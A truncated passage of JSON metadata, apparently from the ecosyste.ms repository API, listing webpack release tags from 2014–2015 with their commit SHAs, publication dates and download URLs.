te.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/web